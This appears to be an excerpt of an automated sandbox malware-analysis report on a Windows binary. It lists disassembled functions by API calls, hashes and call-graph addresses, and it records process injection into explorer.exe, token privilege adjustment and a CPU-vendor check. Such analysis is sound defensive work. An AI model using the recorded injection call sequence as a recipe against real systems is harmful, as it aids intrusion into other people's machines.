                                                      • Instruction Fuzzy Hash: 7731E422614A4282E7758F15F42876A63A0FB88BA4F448334DA9D937E4DF3ED94AC704

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2066545145.00007FF6E5341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5340000, based on PE: true
                                                      • Associated: 00000000.00000002.2066520375.00007FF6E5340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066569844.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066569844.00007FF6E5448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066682591.00007FF6E544A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066702281.00007FF6E544B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff6e5340000_1731043030539.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle$OpenProcess$EnvironmentExpandStringsTokenUserlstrlen
                                                      • String ID: %TEMP%
                                                      • API String ID: 2066944653-235365282
                                                      • Opcode ID: c0b1680c4e13cad4beb039cd7c449280248dcf1c462ff82c215f3d7bf46a2f04
                                                      • Instruction ID: 9eb76a6cd9fd37f8a3f4c47167b536e28f03280553cdbfafc118650036a2e422
                                                      • Opcode Fuzzy Hash: c0b1680c4e13cad4beb039cd7c449280248dcf1c462ff82c215f3d7bf46a2f04
                                                      • Instruction Fuzzy Hash: 0F118F23B1960A85E6705F52A86437A7790AF98F80F044034DE0ED3750EE3EEC4BD35A

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2066545145.00007FF6E5341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5340000, based on PE: true
                                                      • Associated: 00000000.00000002.2066520375.00007FF6E5340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066569844.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066569844.00007FF6E5448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066682591.00007FF6E544A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066702281.00007FF6E544B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff6e5340000_1731043030539.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Token$AccountCloseHandleInformationLookupOpenProcesslstrcpy
                                                      • String ID:
                                                      • API String ID: 454061121-0
                                                      • Opcode ID: e1d1f217c9350a821383d5d86a3fa50bc4f9439d00a3524fed5758a0b4ebb576
                                                      • Instruction ID: 3a85c9ed3d1e917e93ba61446487ae37e44b13115b987c5777d71d65eef9e4fc
                                                      • Opcode Fuzzy Hash: e1d1f217c9350a821383d5d86a3fa50bc4f9439d00a3524fed5758a0b4ebb576
                                                      • Instruction Fuzzy Hash: 96218337618A81C6EB208F55E45039BB3A0FBD4B54F144136DA8DC3A44EF7ED88ADB09

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2066545145.00007FF6E5341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5340000, based on PE: true
                                                      • Associated: 00000000.00000002.2066520375.00007FF6E5340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066569844.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066569844.00007FF6E5448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066682591.00007FF6E544A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066702281.00007FF6E544B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff6e5340000_1731043030539.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CurrentFileProcessWritewsprintf
                                                      • String ID:
                                                      • API String ID: 93935769-0
                                                      • Opcode ID: b8ffbd65c9557ee56dc00454cb98db942b7e180429998d7dff2a41c5c00b45f5
                                                      • Instruction ID: eb2ed9ebbc04f4bb1b3896da23eed21a0132c877d40a6297bd28f7367dff22a9
                                                      • Opcode Fuzzy Hash: b8ffbd65c9557ee56dc00454cb98db942b7e180429998d7dff2a41c5c00b45f5
                                                      • Instruction Fuzzy Hash: E821C11372855181EB708F26D51037A72E1EBA4FA4F148230E95DD3694EF3EC847C745

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00007FF6E53411CB: GetCurrentProcess.KERNEL32 ref: 00007FF6E53411F0
                                                        • Part of subcall function 00007FF6E53411CB: OpenProcessToken.ADVAPI32 ref: 00007FF6E5341201
                                                        • Part of subcall function 00007FF6E53411CB: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF6E534121C
                                                        • Part of subcall function 00007FF6E53411CB: AdjustTokenPrivileges.KERNELBASE ref: 00007FF6E5341259
                                                        • Part of subcall function 00007FF6E53411CB: CloseHandle.KERNELBASE ref: 00007FF6E5341267
                                                        • Part of subcall function 00007FF6E53411CB: wsprintfW.USER32 ref: 00007FF6E5341298
                                                        • Part of subcall function 00007FF6E53411CB: lstrlenW.KERNEL32 ref: 00007FF6E53412AF
                                                        • Part of subcall function 00007FF6E53411CB: OpenProcess.KERNEL32 ref: 00007FF6E53412D5
                                                        • Part of subcall function 00007FF6E53411CB: CloseHandle.KERNEL32 ref: 00007FF6E5341314
                                                        • Part of subcall function 00007FF6E53411CB: wsprintfW.USER32 ref: 00007FF6E5341334
                                                        • Part of subcall function 00007FF6E53411CB: wsprintfW.USER32 ref: 00007FF6E5341382
                                                      • GetModuleHandleW.KERNEL32 ref: 00007FF6E534101B
                                                      • GetModuleFileNameW.KERNEL32 ref: 00007FF6E5341032
                                                        • Part of subcall function 00007FF6E5342700: lstrcpyW.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6E5341040), ref: 00007FF6E5342711
                                                        • Part of subcall function 00007FF6E5342700: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6E5341040), ref: 00007FF6E534273B
                                                        • Part of subcall function 00007FF6E5342700: VirtualAllocEx.KERNELBASE ref: 00007FF6E5342766
                                                        • Part of subcall function 00007FF6E5342700: WriteProcessMemory.KERNELBASE ref: 00007FF6E5342790
                                                        • Part of subcall function 00007FF6E5342700: VirtualProtectEx.KERNELBASE ref: 00007FF6E53427B6
                                                        • Part of subcall function 00007FF6E5342700: CreateRemoteThread.KERNELBASE ref: 00007FF6E53427E9
                                                        • Part of subcall function 00007FF6E5342700: CloseHandle.KERNEL32 ref: 00007FF6E53427F2
                                                        • Part of subcall function 00007FF6E5342700: CloseHandle.KERNEL32 ref: 00007FF6E53427FB
                                                      • ExitProcess.KERNEL32 ref: 00007FF6E5341042
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2066545145.00007FF6E5341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5340000, based on PE: true
                                                      • Associated: 00000000.00000002.2066520375.00007FF6E5340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066569844.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066569844.00007FF6E5448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066682591.00007FF6E544A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066702281.00007FF6E544B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff6e5340000_1731043030539.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$Handle$Close$Openwsprintf$ModuleTokenVirtual$AdjustAllocCreateCurrentExitFileLookupMemoryNamePrivilegePrivilegesProtectRemoteThreadValueWritelstrcpylstrlen
                                                      • String ID:
                                                      • API String ID: 2637963336-0
                                                      • Opcode ID: aaa5e6f4dad646cce857e523ff3e35a1cc70af69005609f547148f43a76e9084
                                                      • Instruction ID: 0fb99b9ad7c836699711f5edc4118caf04dd26e66ae9ce1709f0b70206f93c25
                                                      • Opcode Fuzzy Hash: aaa5e6f4dad646cce857e523ff3e35a1cc70af69005609f547148f43a76e9084
                                                      • Instruction Fuzzy Hash: 61E04F22B18906C2EA34AF31A92577E1262AF44FC4F004135D80FC7691DE3EE90BC70A

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 245 7ff6e5341f2f-7ff6e5341f52 lstrcmpiW 246 7ff6e5341f5b-7ff6e5341f61 245->246 247 7ff6e5341f54-7ff6e5341f59 245->247 247->246
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2066545145.00007FF6E5341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5340000, based on PE: true
                                                      • Associated: 00000000.00000002.2066520375.00007FF6E5340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066569844.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066569844.00007FF6E5448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066682591.00007FF6E544A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066702281.00007FF6E544B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff6e5340000_1731043030539.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcmpi
                                                      • String ID: explorer.exe
                                                      • API String ID: 1586166983-3187896405
                                                      • Opcode ID: 1b0e4e659e91f1f507386cb126651616905f3ddf5d16604af09169ecff75ff3b
                                                      • Instruction ID: f26c7a0422c259de32e4a2b352bda75db82b485623c7f501e0ced351dcde27bb
                                                      • Opcode Fuzzy Hash: 1b0e4e659e91f1f507386cb126651616905f3ddf5d16604af09169ecff75ff3b
                                                      • Instruction Fuzzy Hash: 65E0C272B10546C2EF58DF26E9A01A823B1AB18BA0B40D530CE0DC3304EE29DCDBC700
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2066545145.00007FF6E5341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5340000, based on PE: true
                                                      • Associated: 00000000.00000002.2066520375.00007FF6E5340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066569844.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066569844.00007FF6E5448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066682591.00007FF6E544A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066702281.00007FF6E544B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff6e5340000_1731043030539.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcmp
                                                      • String ID: GenuineIntel
                                                      • API String ID: 1534048567-2798635751
                                                      • Opcode ID: ceaa0ec54db178e2e6e231b194b85b8f26a8e5edac5ca1dec9d25f3ae3ce341f
                                                      • Instruction ID: 89813dc580332624d3cfd37bbbb5264a6e19cfe178f44f050337d656fa386c30
                                                      • Opcode Fuzzy Hash: ceaa0ec54db178e2e6e231b194b85b8f26a8e5edac5ca1dec9d25f3ae3ce341f
                                                      • Instruction Fuzzy Hash: 5AF0B7B2A192408BD764CF29E04071ABBE0F78CB18F148229E64CC3764EB3DCA46CF04

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2066545145.00007FF6E5341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5340000, based on PE: true
                                                      • Associated: 00000000.00000002.2066520375.00007FF6E5340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066569844.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066569844.00007FF6E5448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066682591.00007FF6E544A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066702281.00007FF6E544B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff6e5340000_1731043030539.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$Openlstrcmpi$CloseFullHandleImageNameQueryWow64
                                                      • String ID:
                                                      • API String ID: 1263184081-0
                                                      • Opcode ID: 66efabd2308ca7e8cc47ad869a3164d51d343c317b94ac848e018b3e7f080cab
                                                      • Instruction ID: 3609cb49f8595c23a9922e05948487eca07c90e83228be2689f89c27512b5b93
                                                      • Opcode Fuzzy Hash: 66efabd2308ca7e8cc47ad869a3164d51d343c317b94ac848e018b3e7f080cab
                                                      • Instruction Fuzzy Hash: C4116D37614A45C2E6609F26E8647B663A1EB48F95F048035DE4DC3750DF3EE84AD704

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2066545145.00007FF6E5341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5340000, based on PE: true
                                                      • Associated: 00000000.00000002.2066520375.00007FF6E5340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066569844.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066569844.00007FF6E5448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066682591.00007FF6E544A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066702281.00007FF6E544B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff6e5340000_1731043030539.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ComputerFromNameStringlstrcatlstrcpylstrlen
                                                      • String ID: aaa
                                                      • API String ID: 1214110813-4027020077
                                                      • Opcode ID: 52da686e6899fcfdf271869b875d1c060a24513d856b41f7736baf8db8a6dc85
                                                      • Instruction ID: 8597a9acb8b73056a865019ccf0f7f34c14eb04714752802065fc7e8ebb907f5
                                                      • Opcode Fuzzy Hash: 52da686e6899fcfdf271869b875d1c060a24513d856b41f7736baf8db8a6dc85
                                                      • Instruction Fuzzy Hash: B5018C62A1864681EA31AF16E9203FE2351AB89FD0F445131DE0EC7B94DE7ED94FC706

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2066545145.00007FF6E5341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5340000, based on PE: true
                                                      • Associated: 00000000.00000002.2066520375.00007FF6E5340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066569844.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066569844.00007FF6E5448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066682591.00007FF6E544A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066702281.00007FF6E544B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff6e5340000_1731043030539.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Service$CloseHandleOpen$ManagerQueryStatus
                                                      • String ID:
                                                      • API String ID: 2623946379-0
                                                      • Opcode ID: f12b55399f81954735960b417d83d3d0fc8b8e9527ab447e852bf876cf722c8b
                                                      • Instruction ID: de064dc8753ad06cfc6f320758b32e7ac297d365a83a0d9c6de0612668d9646f
                                                      • Opcode Fuzzy Hash: f12b55399f81954735960b417d83d3d0fc8b8e9527ab447e852bf876cf722c8b
                                                      • Instruction Fuzzy Hash: 03017123B1994582FA689F57A8102B662D1AFD4FD0F084034DD4EC3754EE3ED84B8705
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2066545145.00007FF6E5341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5340000, based on PE: true
                                                      • Associated: 00000000.00000002.2066520375.00007FF6E5340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066569844.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066569844.00007FF6E5448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066682591.00007FF6E544A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066702281.00007FF6E544B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff6e5340000_1731043030539.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Virtualwsprintf$AllocCurrentFileFreeProcessSleepWrite
                                                      • String ID:
                                                      • API String ID: 733823745-0
                                                      • Opcode ID: bcbb75cb2b19442f071ed76d8045e1980bd2bdc914bd3c29063ed0a6d4f38a18
                                                      • Instruction ID: 9f49cba53c4c2a5eba3599c2417dc65bacd8624beb357de04b48f59099115c72
                                                      • Opcode Fuzzy Hash: bcbb75cb2b19442f071ed76d8045e1980bd2bdc914bd3c29063ed0a6d4f38a18
                                                      • Instruction Fuzzy Hash: 9E010052B24A0295FB719B53BC20B7656406B54FD4F444030DD0D97BD4DE3EC84BD309

                                                      Execution Graph

                                                      Execution Coverage:8.4%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:2.2%
                                                      Total number of Nodes:1280
                                                      Total number of Limit Nodes:8
                                                      execution_graph 9512 180014864 9515 18000f584 LeaveCriticalSection 9512->9515 9516 180006664 9517 18000666d 9516->9517 9518 18000668c HeapReAlloc 9517->9518 9519 18000667f 9517->9519 8849 1800147e6 8850 180014802 8849->8850 8851 1800147f8 8849->8851 8853 18000f584 LeaveCriticalSection 8851->8853 8854 1800146e6 8855 1800146f6 8854->8855 8856 180014704 8854->8856 8855->8856 8857 18000a334 _mtterm 72 API calls 8855->8857 8857->8856 9520 180013868 9521 180013883 9520->9521 9522 18001387d CloseHandle 9520->9522 9522->9521 9523 180014f6c GetProcessHeap 8858 1800064f4 8859 180006522 8858->8859 8860 180006513 8858->8860 8860->8859 8861 18000651c HeapDestroy 8860->8861 8861->8859 9524 180014973 9525 180008850 __CxxCallCatchBlock 74 API calls 9524->9525 9528 180014986 9525->9528 9526 18000a148 _getptd 69 API calls 9527 1800149cb 9526->9527 9529 18000a148 _getptd 69 API calls 9527->9529 9530 1800088e0 __CxxCallCatchBlock 69 API calls 9528->9530 9532 1800149b7 __DestructExceptionObject 9528->9532 9531 1800149de 9529->9531 9530->9532 9532->9526 8862 18000dcf8 8865 18000f1a0 8862->8865 8866 18000a148 _getptd 69 API calls 8865->8866 8867 18000f1a9 8866->8867 8870 18000c6e0 8867->8870 8879 1800117b8 DecodePointer 8870->8879 9533 18000c07c 9534 18000c097 9533->9534 9535 18000bd1c _calloc_crt 69 API calls 9534->9535 9536 18000c0b6 9535->9536 9537 18000bd1c _calloc_crt 69 API calls 9536->9537 9538 18000c0d3 9536->9538 9537->9538 8883 180012b00 8884 180012b2a 8883->8884 8885 180012b34 8883->8885 8884->8885 8886 180006be0 _LocaleUpdate::_LocaleUpdate 69 API calls 8884->8886 8887 180012b67 8886->8887 8887->8885 8895 18001145c 8887->8895 8890 180012bfa MultiByteToWideChar 8890->8885 8892 180012be0 8890->8892 8891 180012ba0 8891->8892 8893 180012bb6 MultiByteToWideChar 8891->8893 8892->8885 8894 18000a3c8 _errno 69 API calls 8892->8894 8893->8885 8893->8892 8894->8885 8896 180006be0 _LocaleUpdate::_LocaleUpdate 69 API calls 8895->8896 8897 18001146e 8896->8897 8897->8890 8897->8891 8898 180006200 8901 180008b98 8898->8901 8904 180008bd4 8901->8904 8905 180008be9 8904->8905 8908 18000620e 8904->8908 8910 180008cb0 8905->8910 8909 180008c54 std::exception::_Copy_str 69 API calls 8909->8908 8911 180008bee 8910->8911 8912 180008cbf 8910->8912 8911->8908 8911->8909 8913 1800073d4 free 69 API calls 8912->8913 8913->8911 8914 180006600 HeapSize 9539 18001487f 9540 1800148ae 9539->9540 9541 18000a148 _getptd 69 API calls 9540->9541 9542 180014948 9540->9542 9541->9542 8915 18000e702 8916 18000f1a0 FindHandler 73 API calls 8915->8916 8917 18000e707 8916->8917 7598 180008184 7599 1800081a0 7598->7599 7603 1800081a5 7598->7603 7612 18000da9c 7599->7612 7601 1800081fa 7602 180008230 7602->7601 7664 180003de0 7602->7664 7603->7601 7603->7602 7615 180008024 7603->7615 7607 180003de0 _DllMainCRTStartup 101 API calls 7609 18000826a 7607->7609 7608 180008024 _CRT_INIT 148 API calls 7608->7601 7610 180008024 _CRT_INIT 148 API calls 7609->7610 7611 180008277 7610->7611 7611->7601 7611->7608 7613 18000db33 7612->7613 7614 18000dac4 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7612->7614 7613->7603 7614->7613 7616 1800080b3 7615->7616 7617 180008036 7615->7617 7619 180008109 7616->7619 7625 1800080b7 _CRT_INIT 7616->7625 7678 18000b390 GetProcessHeap 7617->7678 7621 18000816c 7619->7621 7622 18000810e 7619->7622 7620 18000803b 7632 18000803f _CRT_INIT 7620->7632 7679 18000a2b4 7620->7679 7621->7632 7800 18000a10c 7621->7800 7797 18000cce4 7622->7797 7625->7632 7774 18000b554 DecodePointer 7625->7774 7629 18000804b _RTC_Initialize 7629->7632 7636 18000805b GetCommandLineA 7629->7636 7632->7602 7634 18000d638 _ioterm 70 API calls 7637 1800080e9 7634->7637 7696 18000db48 GetEnvironmentStringsW 7636->7696 7638 18000a334 _mtterm 72 API calls 7637->7638 7642 1800080ee _CRT_INIT 7638->7642 7641 18000a334 _mtterm 72 API calls 7641->7632 7642->7632 7642->7641 7665 180003dfd 7664->7665 7674 180003e32 7664->7674 8562 1800013c0 CreateFileMappingA 7665->8562 7667 180003e02 8567 180003d40 GetCurrentProcess OpenProcessToken LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 7667->8567 7672 180003e26 7673 180001450 _DllMainCRTStartup 88 API calls 7672->7673 7673->7674 7674->7607 7674->7611 7675 180003e34 8576 180004a40 7675->8576 7677 180003e5d CreateThread 7677->7674 7678->7620 7808 18000b790 EncodePointer 7679->7808 7681 18000a2bf 7813 18000f524 7681->7813 7684 18000a326 7686 18000a334 _mtterm 72 API calls 7684->7686 7687 18000a32b 7686->7687 7687->7629 7697 18000806d 7696->7697 7699 18000db76 7696->7699 7709 18000d30c 7697->7709 7698 18000db93 WideCharToMultiByte 7700 18000dbc5 7698->7700 7701 18000dc16 FreeEnvironmentStringsW 7698->7701 7699->7698 7699->7699 7821 18000bd9c 7700->7821 7701->7697 7704 18000dbd5 WideCharToMultiByte 7705 18000dc08 FreeEnvironmentStringsW 7704->7705 7706 18000dbfd 7704->7706 7705->7697 7826 1800073d4 7706->7826 7708 18000dc05 7708->7705 8038 18000f39c 7709->8038 7775 18000b58d 7774->7775 7776 18000b57a 7774->7776 7777 1800073d4 free 69 API calls 7775->7777 7776->7775 7778 1800073d4 free 69 API calls 7776->7778 7779 18000b59c 7777->7779 7778->7776 7780 18000b5c3 7779->7780 7783 1800073d4 free 69 API calls 7779->7783 7781 1800073d4 free 69 API calls 7780->7781 7782 18000b5d2 7781->7782 7784 1800073d4 free 69 API calls 7782->7784 7783->7779 7785 18000b5e6 7784->7785 7786 1800073d4 free 69 API calls 7785->7786 7787 18000b5f2 7786->7787 7788 18000b61d EncodePointer 7787->7788 7792 1800073d4 free 69 API calls 7787->7792 7789 18000b63e 7788->7789 7790 18000b639 7788->7790 7791 18000b657 7789->7791 7794 1800073d4 free 69 API calls 7789->7794 7793 1800073d4 free 69 API calls 7790->7793 7795 1800080df 7791->7795 7796 1800073d4 free 69 API calls 7791->7796 7792->7788 7793->7789 7794->7791 7795->7634 7795->7642 7796->7795 7798 18000ccf4 7797->7798 7799 18000ccf7 TlsGetValue 7797->7799 7798->7799 7801 18000a142 7800->7801 7802 18000a120 7800->7802 7801->7632 7803 18000a12a 7802->7803 7804 18000cce4 _freeptd TlsGetValue 7802->7804 7805 18000cd00 _mtinit TlsSetValue 7803->7805 7804->7803 7806 18000a13a 7805->7806 8529 180009fd8 7806->8529 7809 18000b7a9 _init_pointers 7808->7809 7820 18000f1c0 EncodePointer 7809->7820 7811 18000b7d1 30 API calls 7811->7681 7814 18000f53f 7813->7814 7815 18000f545 InitializeCriticalSectionAndSpinCount 7814->7815 7816 18000a2c4 7814->7816 7815->7814 7816->7684 7817 18000ccac 7816->7817 7818 18000ccbc 7817->7818 7819 18000ccbf TlsAlloc 7817->7819 7818->7819 7820->7811 7822 18000bdc4 7821->7822 7824 18000bdf9 7822->7824 7825 18000bdd8 Sleep 7822->7825 7832 180007414 7822->7832 7824->7701 7824->7704 7825->7822 7825->7824 7827 1800073d9 HeapFree 7826->7827 7831 180007409 free 7826->7831 7828 1800073f4 7827->7828 7827->7831 7829 18000a3c8 _errno 67 API calls 7828->7829 7830 1800073f9 GetLastError 7829->7830 7830->7831 7831->7708 7833 1800074a8 7832->7833 7846 18000742c 7832->7846 7834 18000b3bc _callnewh DecodePointer 7833->7834 7836 1800074ad 7834->7836 7835 180007464 HeapAlloc 7839 18000749d 7835->7839 7835->7846 7838 18000a3c8 _errno 68 API calls 7836->7838 7841 1800074b2 7838->7841 7839->7841 7840 18000748d 7903 18000a3c8 7840->7903 7841->7822 7845 180007492 7848 18000a3c8 _errno 68 API calls 7845->7848 7846->7835 7846->7840 7846->7845 7849 18000b9fc 7846->7849 7858 18000ba70 7846->7858 7898 18000b53c 7846->7898 7901 18000b3bc DecodePointer 7846->7901 7848->7839 7906 180011be8 7849->7906 7852 18000ba19 7853 18000ba70 _NMSG_WRITE 69 API calls 7852->7853 7856 18000ba3a 7852->7856 7855 18000ba30 7853->7855 7854 180011be8 _set_error_mode 69 API calls 7854->7852 7857 18000ba70 _NMSG_WRITE 69 API calls 7855->7857 7856->7846 7857->7856 7859 18000baa4 _NMSG_WRITE 7858->7859 7860 180011be8 _set_error_mode 66 API calls 7859->7860 7897 18000bbde 7859->7897 7862 18000baba 7860->7862 7864 18000bbe0 GetStdHandle 7862->7864 7865 180011be8 _set_error_mode 66 API calls 7862->7865 7866 18000bbf8 std::exception::_Copy_str 7864->7866 7864->7897 7868 18000bacb 7865->7868 7869 18000bc30 WriteFile 7866->7869 7867 18000badc 7867->7897 7934 180011a94 7867->7934 7868->7864 7868->7867 7869->7897 7872 18000bb11 GetModuleFileNameW 7874 18000bb36 7872->7874 7881 18000bb4f _NMSG_WRITE 7872->7881 7873 18000bccb 7875 180008f90 _invoke_watson 16 API calls 7873->7875 7876 180011a94 _NMSG_WRITE 66 API calls 7874->7876 7877 18000bcde 7875->7877 7878 18000bb47 7876->7878 7879 18000bc78 7878->7879 7878->7881 7882 180008f90 _invoke_watson 16 API calls 7879->7882 7880 18000bb99 7952 180011a0c 7880->7952 7881->7880 7943 180011b1c 7881->7943 7884 18000bc8c 7882->7884 7889 180008f90 _invoke_watson 16 API calls 7884->7889 7886 18000bcb6 7890 180008f90 _invoke_watson 16 API calls 7886->7890 7888 180011a0c _NMSG_WRITE 66 API calls 7892 18000bbc1 7888->7892 7893 18000bca1 7889->7893 7890->7873 7892->7893 7894 18000bbc9 7892->7894 7896 180008f90 _invoke_watson 16 API calls 7893->7896 7961 180011c28 EncodePointer 7894->7961 7896->7886 7985 180006bc0 7897->7985 8004 18000b4f8 GetModuleHandleExW 7898->8004 7902 18000b3d7 7901->7902 7902->7846 8007 18000a16c GetLastError 7903->8007 7905 18000a3d1 7905->7845 7907 180011bf0 7906->7907 7908 18000ba0a 7907->7908 7909 18000a3c8 _errno 69 API calls 7907->7909 7908->7852 7908->7854 7910 180011c15 7909->7910 7912 180008f70 7910->7912 7915 180008f08 DecodePointer 7912->7915 7916 180008f46 7915->7916 7921 180008f90 IsProcessorFeaturePresent 7916->7921 7922 180008fa2 7921->7922 7926 180008e0c 7922->7926 7927 180008e47 sprintf __raise_securityfailure 7926->7927 7928 18000cbc8 __crtCaptureCurrentContext RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 7927->7928 7929 180008e7f IsDebuggerPresent 7928->7929 7930 18000d10c __crtUnhandledException SetUnhandledExceptionFilter UnhandledExceptionFilter 7929->7930 7933 180008ec2 __raise_securityfailure 7930->7933 7931 180006bc0 setSBUpLow 9 API calls 7932 180008ee5 GetCurrentProcess TerminateProcess 7931->7932 7933->7931 7935 180011aa2 7934->7935 7936 180011aac 7934->7936 7935->7936 7938 180011ac9 